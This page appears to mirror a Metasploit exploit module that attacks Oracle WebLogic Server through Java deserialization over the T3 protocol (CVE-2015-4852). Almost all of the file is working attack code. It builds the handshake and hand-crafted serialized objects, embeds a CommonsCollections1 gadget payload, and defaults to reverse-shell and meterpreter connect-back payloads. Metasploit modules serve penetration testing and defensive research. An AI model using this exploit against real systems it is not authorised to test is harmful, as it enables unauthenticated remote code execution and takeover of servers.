Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb
19591 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::Tcp
10
include Msf::Exploit::JavaDeserialization
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Oracle Weblogic Server Deserialization RCE - Raw Object',
17
'Description' => %q{
18
An unauthenticated attacker with network access to the Oracle Weblogic Server T3
19
interface can send a serialized object (weblogic.jms.common.StreamMessageImpl)
20
to the interface to execute code on vulnerable hosts.
21
},
22
'Author' => [
23
'Andres Rodriguez', # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
24
'Stephen Breen', # Vulnerability Discovery
25
'Aaron Soto', # Reverse Engineering JSO and ysoserial blobs
26
'Steve Embling', # T3S porting and testing
27
],
28
'License' => MSF_LICENSE,
29
'References' => [
30
['CVE', '2015-4852']
31
],
32
'Privileged' => false,
33
'Platform' => %w{unix win solaris},
34
'Targets' => [
35
[
36
'Unix',
37
'Platform' => 'unix',
38
'Arch' => ARCH_CMD,
39
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' },
40
'Payload' => {
41
'Compat' => { 'PayloadType' => 'cmd' }
42
}
43
],
44
[
45
'Windows',
46
'Platform' => 'win',
47
'Payload' => {},
48
'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
49
],
50
[
51
'Solaris',
52
'Platform' => 'solaris',
53
'Arch' => ARCH_CMD,
54
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },
55
'Payload' => {
56
'Space' => 2048,
57
'DisableNops' => true,
58
'Compat' =>
59
{
60
'PayloadType' => 'cmd',
61
'RequiredCmd' => 'generic perl telnet',
62
}
63
}
64
]
65
],
66
'DefaultTarget' => 0,
67
'DisclosureDate' => '2015-01-28',
68
'Notes' => {
69
'Reliability' => [REPEATABLE_SESSION],
70
'Stability' => [CRASH_SAFE],
71
'SideEffects' => [IOC_IN_LOGS]
72
}
73
)
74
)
75
76
register_options([
77
Opt::RPORT(7001),
78
])
79
80
register_advanced_options([
81
OptBool.new('FORCE_T3', [false, 'Force T3 protocol even over SSL', false])
82
])
83
end
84
85
=begin This check is currently incompatible with the Tcp mixin. :-(
86
def check
87
resp = send_request_cgi(
88
'method' => 'GET',
89
'uri' => '/console/login/LoginForm.jsp'
90
)
91
92
return CheckCode::Unknown unless resp && resp.code == 200
93
94
unless resp.body.include?('Oracle WebLogic Server Administration Console')
95
vprint_warning("Oracle WebLogic Server banner cannot be found")
96
return CheckCode::Unknown
97
end
98
99
/WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.\d*)/ =~ resp.body
100
unless version
101
vprint_warning("Oracle WebLogic Server version cannot be found")
102
return CheckCode::Unknown
103
end
104
105
version = Rex::Version.new(version)
106
vprint_good("Detected Oracle WebLogic Server Version: #{version}")
107
case
108
when version.to_s.start_with?('10.3')
109
return CheckCode::Appears unless version > Rex::Version.new('10.3.6.0')
110
when version.to_s.start_with?('12.1.2')
111
return CheckCode::Appears unless version > Rex::Version.new('12.1.2.0')
112
when version.to_s.start_with?('12.1.3')
113
return CheckCode::Appears unless version > Rex::Version.new('12.1.3.0')
114
when version.to_s.start_with?('12.2')
115
return CheckCode::Appears unless version > Rex::Version.new('12.2.1.0')
116
end
117
118
return CheckCode::Safe
119
end
120
=end
121
122
def t3_handshake
123
# retrieved from network traffic
124
if !datastore['SSL'] || datastore['FORCE_T3']
125
shake = 't3'
126
else
127
shake = 't3s'
128
end
129
shake << " 12.2.1\n"
130
shake << "AS:255\n"
131
shake << "HL:19\n"
132
shake << "MS:10000000\n\n"
133
134
sock.put(shake)
135
sleep(1)
136
sock.get_once
137
end
138
139
def build_t3_request_object
140
# T3 request serialized data
141
# retrieved by watching network traffic
142
# This is a proprietary, undocumented protocol
143
144
# TODO: Cite a source for the dissection of in the following 14 lines:
145
data = '000005c3' # lenght of the packet
146
data << '01' # CMD_IDENTIFY_REQUEST
147
data << '65' # QOS
148
data << '01' # Flags:
149
# CONTEXT_JVMID_FLAG = 1 (has JVMIDs)
150
# CONTEXT_TX_FLAG = 2
151
# CONTEXT_TRACE_FLAG = 4
152
# CONTEXT_EXTENDED_FLAG = 8
153
# CONTEXT_EXTENDED_USER_FLAG = 16
154
data << 'ffffffff' # response id
155
data << 'ffffffff' # invocable id
156
data << '0000006a' # abbrev offset
157
data << '0000ea60' # reconnect timeout ??
158
159
data << '0000001900937b484a'
160
data << '56fa4a777666f581daa4f5b90e2aebfc607499'
161
data << 'b4027973720078720178720278700000000a00'
162
data << '00000300000000000000060070707070707000'
163
data << '00000a000000030000000000000006007006'
164
165
data << 'fe010000' # ----- separator -----
166
167
data << 'aced0005' # JSO v5 header
168
data << '73' # object header
169
data << '72001d' # className (29 bytes):
170
data << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry
171
data << '5461626c65456e747279' # (continued)
172
data << '2f52658157f4f9ed' # serialVersionUID
173
data << '0c00007870' # remainder of object header
174
data << '72' # object header
175
data << '00247765626c6f6769632e636f6d6d6f6e2e696e74' # className (36 bytes): weblogic.common.internal.PackageInfo
176
data << '65726e616c2e5061636b616765496e666f' # (continued)
177
data << 'e6f723e7b8ae1ec9' # serialVersionUID
178
data << '02' # SC_SERIALIZABLE
179
data << '0008' # fieldCount = 8
180
data << '4900056d616a6f72' # 0: Int: major
181
data << '4900056d696e6f72' # 1: Int: minor
182
data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch
183
data << '49000b736572766963655061636b' # 3: Int: servicePack
184
data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch
185
data << '4c0009696d706c5469746c65' # 5: Obj: implTitle
186
data << '7400124c6a6176612f6c616e672f537472696e673b' # java/lang/String
187
data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor
188
data << '71007e0003' # (Handle) 0x007e0003
189
data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion
190
data << '71007e0003' # (Handle) 0x007e0003
191
data << '78707702000078' # block footers
192
193
data << 'fe010000' # ----- separator -----
194
195
data << 'aced0005' # JSO v5 header
196
data << '7372' # object header
197
data << '001d7765626c6f6769632e726a766d2e436c6173' # className (29 bytes): weblogic.rjvm.ClassTableEntry
198
data << '735461626c65456e747279' # (continued)
199
data << '2f52658157f4f9ed' # serialVersionUID
200
data << '0c' # EXTERNALIZABLE | BLOCKDATA
201
data << '00007870' # remainder of object header
202
data << '72' # object header
203
data << '00247765626c6f6769632e636f6d6d6f6e2e696' # className (36 bytes): weblogic.common.internal.VersionInfo
204
data << 'e7465726e616c2e56657273696f6e496e666f' # (continued)
205
data << '972245516452463e' # serialVersionUID
206
data << '02' # SC_SERIALIZABLE
207
data << '0003' # fieldCount = 3
208
data << '5b0008' # array header (8 bytes)
209
data << '7061636b61676573' # ARRAY NAME = 'packages'
210
data << '740027' # TC_STRING className1 (39 bytes)
211
data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # weblogic/common/internal/PackageInfo
212
data << '6e7465726e616c2f5061636b616765496e666f' # (continued)
213
data << '3b' # (continued)
214
data << '4c000e' # object header (14 bytes)
215
data << '72656c6561736556657273696f6e' # releaseVersion
216
data << '740012' # TC_STRING (18 bytes)
217
data << '4c6a6176612f6c616e672f537472696e673b' # versionInfoAsBytes
218
data << '5b0012' # array header (18 bytes)
219
data << '76657273696f6e496e666f41734279746573' # ARRAY NAME = java/lang/String;
220
data << '740002' # TC_STRING (2 bytes)
221
data << '5b42' # 0x5b42 = [B
222
data << '78' # block footer
223
224
data << '720024' # class (36 bytes)
225
data << '7765626c6f6769632e636f6d6d6f6e2e696e' # weblogic.common.internal.PackageInfo
226
data << '7465726e616c2e5061636b616765496e666f' # (continued)
227
data << 'e6f723e7b8ae1ec9' # serialVersionUID
228
229
data << '02' # SC_SERIALIZABLE
230
data << '0008' # fieldCount = 8
231
data << '4900056d616a6f72' # 0: Int: major
232
data << '4900056d696e6f72' # 1: Int: minor
233
data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch
234
data << '49000b736572766963655061636b' # 3: Int: servicePack
235
data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch
236
data << '4c0009696d706c5469746c65' # 5: Obj: implTitle
237
data << '71' # TC_REFERENCE
238
data << '007e0004' # Handle = 0x007e0004
239
data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor
240
data << '71' # TC_REFERENCE
241
data << '007e0004' # Handle = 0x007e0004
242
data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion
243
data << '71' # TC_REFERENCE
244
data << '007e0004' # Handle = 0x007e0004
245
data << '78' # class footer
246
data << '70' # TC_NULL
247
data << '77020000' # BLOCKDATA (2 bytes): 0x0000
248
data << '78' # block footer
249
250
data << 'fe010000' # ----- separator -----
251
252
data << 'aced0005' # JSO v5 header
253
data << '73' # object header
254
data << '72001d' # className (29 bytes):
255
data << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry
256
data << '5461626c65456e747279' # (continued)
257
data << '2f52658157f4f9ed' # serialVersionUID
258
data << '0c00007870' # remainder of object header
259
data << '720021' # className (33 bytes)
260
data << '7765626c6f6769632e636f6d6d6f6e2e696e74' # weblogic.common.internal.PeerInfo
261
data << '65726e616c2e50656572496e666f' # (continued)
262
data << '585474f39bc908f1' # serialVersionUID
263
data << '02' # SC_SERIALIZABLE
264
data << '0006' # fieldCount = 6
265
data << '4900056d616a6f72' # 0: Int: major
266
data << '4900056d696e6f72' # 1: Int: minor
267
data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch
268
data << '49000b736572766963655061636b' # 3: Int: servicePack
269
data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch
270
data << '5b00087061636b61676573' # 5: Array: packages
271
data << '740027' # TC_STRING (39 bytes)
272
data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # Lweblogic/common/internal/PackageInfo;
273
data << '6e7465726e616c2f5061636b616765496e666f' # (continued)
274
data << '3b' # (continued)
275
data << '78' # block footer
276
data << '720024' # class header
277
data << '7765626c6f6769632e636f6d6d6f6e2e696e74' # Name = Lweblogic/common/internal/PackageInfo;
278
data << '65726e616c2e56657273696f6e496e666f' # (continued)
279
data << '972245516452463e' # serialVersionUID
280
data << '02' # SC_SERIALIZABLE
281
data << '0003' # fieldCount = 3
282
data << '5b0008' # 0: Array
283
data << '7061636b6167657371' # packages
284
data << '007e0003' # Handle = 0x00730003
285
data << '4c000e72656c6561736556657273696f6e' # 1: Obj: releaseVersion
286
data << '7400124c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String;
287
data << '5b001276657273696f6e496e666f41734279746573' # 2: Array: versionInfoAsBytes
288
data << '740002' # TC_STRING (2 bytes)
289
data << '5b42' # VALUE = 0x5b42 = [B
290
data << '78' # block footer
291
data << '720024' # class header
292
data << '7765626c6f6769632e636f6d6d6f6e2e696e746572' # Name = weblogic.common.internal.PackageInfo
293
data << '6e616c2e5061636b616765496e666f' # (continued)
294
data << 'e6f723e7b8ae1ec9' # serialVersionUID
295
data << '02' # SC_SERIALIZABLE
296
data << '0008' # fieldCount = 8
297
data << '4900056d616a6f72' # 0: Int: major
298
data << '4900056d696e6f72' # 1: Int: minor
299
data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch
300
data << '49000b736572766963655061636b' # 3: Int: servicePack
301
data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch
302
data << '4c0009696d706c5469746c65' # 5: Obj: implTitle
303
data << '71' # TC_REFERENCE
304
data << '007e0005' # Handle = 0x007e0005
305
data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor
306
data << '71' # TC_REFERENCE
307
data << '007e0005' # Handle = 0x007e0005
308
data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion
309
data << '71' # TC_REFERENCE
310
data << '007e0005' # Handle = 0x007e0005
311
data << '78' # class footer
312
data << '707702000078' # block footers
313
314
data << 'fe00ff' # this cruft again. some kind of footer
315
316
data << 'fe010000' # ----- separator -----
317
318
# weblogic.rjvm.JVMID object
319
data << 'aced0005' # JSO v5 header
320
data << '73' # object header
321
data << '720013' # class header
322
data << '7765626c6f6769632e726a766d2e4a564d4944' # name = 'weblogic.rjvm.JVMID'
323
data << 'dc49c23ede121e2a' # serialVersionUID
324
data << '0c' # EXTERNALIZABLE | BLOCKDATA
325
data << '0000' # fieldCount = 0 (!!!)
326
data << '78' # block footer
327
data << '70' # NULL
328
data << '7750' # block header (80 bytes)
329
data << '21' # !
330
data << '000000000000000000' # 9 NULL BYTES
331
332
data << '0d' # strLength = 13 bytes
333
# data << '3139322e3136382e312e323237' # original PoC string = 192.168.1.227
334
data << '3030302e3030302e3030302e30' # new string = 000.000.000.0
335
# (must be an IP, and length isn't trivially editable)
336
data << '00' # \0
337
338
data << '12' # strLength = 18 bytes
339
# data << '57494e2d4147444d565155423154362e6568' # original str = WIN-AGDMVQUB1T6.eh
340
data << rand_text_alphanumeric(18).unpack('H*')[0]
341
342
data << '83348cd6' # original = ??? UNKNOWN ??? (Note: Cannot be randomized)
343
344
data << '000000070000' # ??? UNKNOWN ???
345
data << rport.to_s(16).rjust(4, '0') # callback port
346
data << 'ffffffffffffffffffffffffffffffffffffff' # ??? UNKNOWN ???
347
data << 'ffffffffff' # ??? UNKNOWN ???
348
data << '78' # block footer
349
350
data << 'fe010000' # ----- separator -----
351
352
# weblogic.rjvm.JVMID object
353
data << 'aced0005' # JSO v5 header
354
data << '73' # object header
355
data << '72' # class
356
data << '00137765626c6f6769632e726a766d2e4a564d4944' # Name: weblogic.rjvm.JVMID
357
data << 'dc49c23ede121e2a' # serialVersionUID
358
data << '0c' # EXTERNALIZABLE | BLOCKDATA
359
data << '0000' # fieldCount = 0
360
data << '78' # end block
361
data << '70' # TC_NULL
362
data << '77' # block header
363
data << '20' # length = 32 bytes
364
data << '0114dc42bd071a772700' # old string = ??? UNKNOWN ???
365
# data << rand_text_alphanumeric(10).unpack('H*')[0] # (NOTE: RANDOMIZATION BREAKS THINGS)
366
367
data << '0d' # string length = 13 bytes (NOTE: do not edit)
368
# data << '3234322e3231342e312e323534' # original string = 242.214.1.254
369
data << '3030302e3030302e3030302e30' # new string = 000.000.000.0
370
# (must be an IP, and length isn't trivially editable)
371
372
# data << '61863d1d' # original string = ??? UNKNOWN ???
373
data << rand_text_alphanumeric(4).unpack('H*')[0] # new = randomized
374
375
data << '00000000' # NULL BYTES
376
data << '78' # block footer
377
378
sock.put([data].pack('H*'))
379
sleep(1)
380
sock.get_once
381
end
382
383
def send_payload_objdata
384
# basic weblogic ClassTableEntry object (serialized)
385
# TODO: WHAT DOES THIS DO? CAN WE RANDOMIZE ANY OF IT?
386
objdata = '056508000000010000001b0000005d0101007372017870737202787000000000'
387
objdata << '00000000757203787000000000787400087765626c6f67696375720478700000'
388
objdata << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306'
389
390
objdata << 'fe010000' # ----- separator -----
391
392
objdata << 'aced0005' # JSO v5 header
393
objdata << '73' # object header
394
objdata << '72' # class
395
objdata << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry
396
objdata << '73735461626c65456e747279' # (cont)
397
objdata << '2f52658157f4f9ed' # serialVersionUID
398
objdata << '0c' # EXTERNALIZABLE | BLOCKDATA
399
objdata << '0000' # fieldCount = 0
400
objdata << '7870' # remaining object header
401
objdata << '72' # class header
402
objdata << '00025b42' # Name: 0x5b42
403
objdata << 'acf317f8060854e0' # serialVersionUID
404
objdata << '02' # SERIALIZABLE
405
objdata << '0000' # fieldCount = 0
406
objdata << '7870' # class footer
407
objdata << '77' # block header
408
objdata << '020000' # contents = 0x0000
409
objdata << '78' # block footer
410
411
objdata << 'fe010000' # ----- separator -----
412
413
objdata << 'aced0005' # JSO v5 header
414
objdata << '73' # object header
415
objdata << '72' # class
416
objdata << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry
417
objdata << '73735461626c65456e747279' # (cont)
418
objdata << '2f52658157f4f9ed' # serialVersionUID
419
objdata << '0c' # EXTERNALIZABLE | BLOCKDATA
420
objdata << '0000' # fieldCount = 0
421
objdata << '7870' # remaining object header
422
objdata << '72' # class header
423
424
objdata << '00135b4c6a6176612e6c616e672e4f626a' # Name: [Ljava.lang.Object;
425
objdata << '6563743b' # (cont)
426
objdata << '90ce589f1073296c' # serialVersionUID
427
objdata << '02' # SERIALIZABLE
428
objdata << '0000' # fieldCount = 0
429
objdata << '7870' # remaining object header
430
objdata << '77' # block header
431
objdata << '020000' # contents = 0x0000
432
objdata << '78' # block footer
433
434
objdata << 'fe010000' # ----- separator -----
435
436
objdata << 'aced0005' # JSO v5 header
437
objdata << '73' # object header
438
objdata << '72' # class
439
440
objdata << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry
441
objdata << '73735461626c65456e747279' # (cont)
442
objdata << '2f52658157f4f9ed' # serialVersionUID
443
objdata << '0c' # SERIALIZABLE | BLOCKDATA
444
objdata << '0000' # fieldCount = 0
445
objdata << '7870' # block footer
446
objdata << '72' # class header
447
objdata << '00106a6176612e7574696c2e566563746f72' # Name: java.util.Vector
448
objdata << 'd9977d5b803baf01' # serialVersionUID
449
objdata << '03' # WRITE_METHOD | SERIALIZABLE
450
objdata << '0003' # fieldCount = 3
451
objdata << '4900116361706163697479496e6372656d656e74' # 0: Int: capacityIncrement
452
objdata << '49000c656c656d656e74436f756e74' # 1: Int: elementCount
453
objdata << '5b000b656c656d656e7444617461' # 2: Array: elementData
454
objdata << '7400135b4c6a6176612f6c616e672f4f626a6563' # 3: String: [Ljava/lang/Object;
455
objdata << '743b' # (cont)
456
objdata << '7870' # remaining object header
457
objdata << '77' # block header
458
objdata << '020000' # contents = 0x0000
459
objdata << '78' # block footer
460
461
objdata << 'fe010000' # ----- separator -----
462
463
java_payload = generate_java_deserialization_for_payload('CommonsCollections1', payload)
464
objdata << java_payload.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
465
466
objdata << 'fe010000' # ----- separator -----
467
468
# basic weblogic ImmutableServiceContext object (serialized)
469
objdata << 'aced0005' # JSO v5 header
470
objdata << '73' # object header
471
objdata << '72' # class
472
objdata << '00257765626c6f6769632e726a766d2e496d6d75' # Name: weblogic.rjvm.ImmutableServiceContext
473
objdata << '7461626c6553657276696365436f6e74657874' # (cont)
474
objdata << 'ddcba8706386f0ba' # serialVersionUID
475
objdata << '0c' # EXTERNALIZABLE | BLOCKDATA
476
objdata << '0000' # fieldCount = 0
477
objdata << '78' # object footer
478
objdata << '72' # block header
479
objdata << '00297765626c6f6769632e726d692e70726f76' # Name: weblogic.rmi.provider.BasicServiceContext
480
objdata << '696465722e426173696353657276696365436f' # (cont)
481
objdata << '6e74657874' # (cont)
482
objdata << 'e4632236c5d4a71e' # serialVersionUID
483
objdata << '0c' # EXTERNALIZABLE | BLOCKDATA
484
objdata << '0000' # fieldCount = 0
485
objdata << '7870' # block footer
486
objdata << '77' # block header
487
objdata << '020600' # contents = 0x0600
488
objdata << '7372' # class descriptor
489
objdata << '00267765626c6f6769632e726d692e696e7465' # Name: weblogic.rmi.internal.MethodDescriptor
490
objdata << '726e616c2e4d6574686f644465736372697074' # (cont)
491
objdata << '6f72' # (cont)
492
objdata << '12485a828af7f67b' # serialVersionUID
493
objdata << '0c' # EXTERNALIZABLE | BLOCKDATA
494
objdata << '0000' # fieldCount = 0
495
objdata << '7870' # class footer
496
objdata << '77' # class data
497
498
# payload << '34002e61757468656e746963617465284c7765' # old contents = 0x002e61757468656e746963617465284c7765
499
# payload << '626c6f6769632e73656375726974792e61636c' # 626c6f6769632e73656375726974792e61636c
500
# payload << '2e55736572496e666f3b290000001b' # 2e55736572496e666f3b290000001b
501
objdata << rand_text_alphanumeric(52).unpack('H*')[0] # new = randomized
502
objdata << '78' # class footer
503
objdata << '78' # block footer
504
# MISSING OBJECT FOOTER (0x78)
505
506
objdata << 'fe00ff' # this cruft again. some kind of footer
507
508
# sets the length of the stream
509
data = ((objdata.length >> 1) + 4).to_s(16).rjust(8, '0')
510
data << objdata
511
512
sock.put([data].pack('H*'))
513
sleep(1)
514
sock.get_once
515
end
516
517
def exploit
518
connect
519
520
print_status('Sending handshake...')
521
t3_handshake
522
523
print_status('Sending T3 request object...')
524
build_t3_request_object
525
526
print_status('Sending client object payload...')
527
send_payload_objdata
528
529
handler
530
disconnect
531
end
532
end
533
534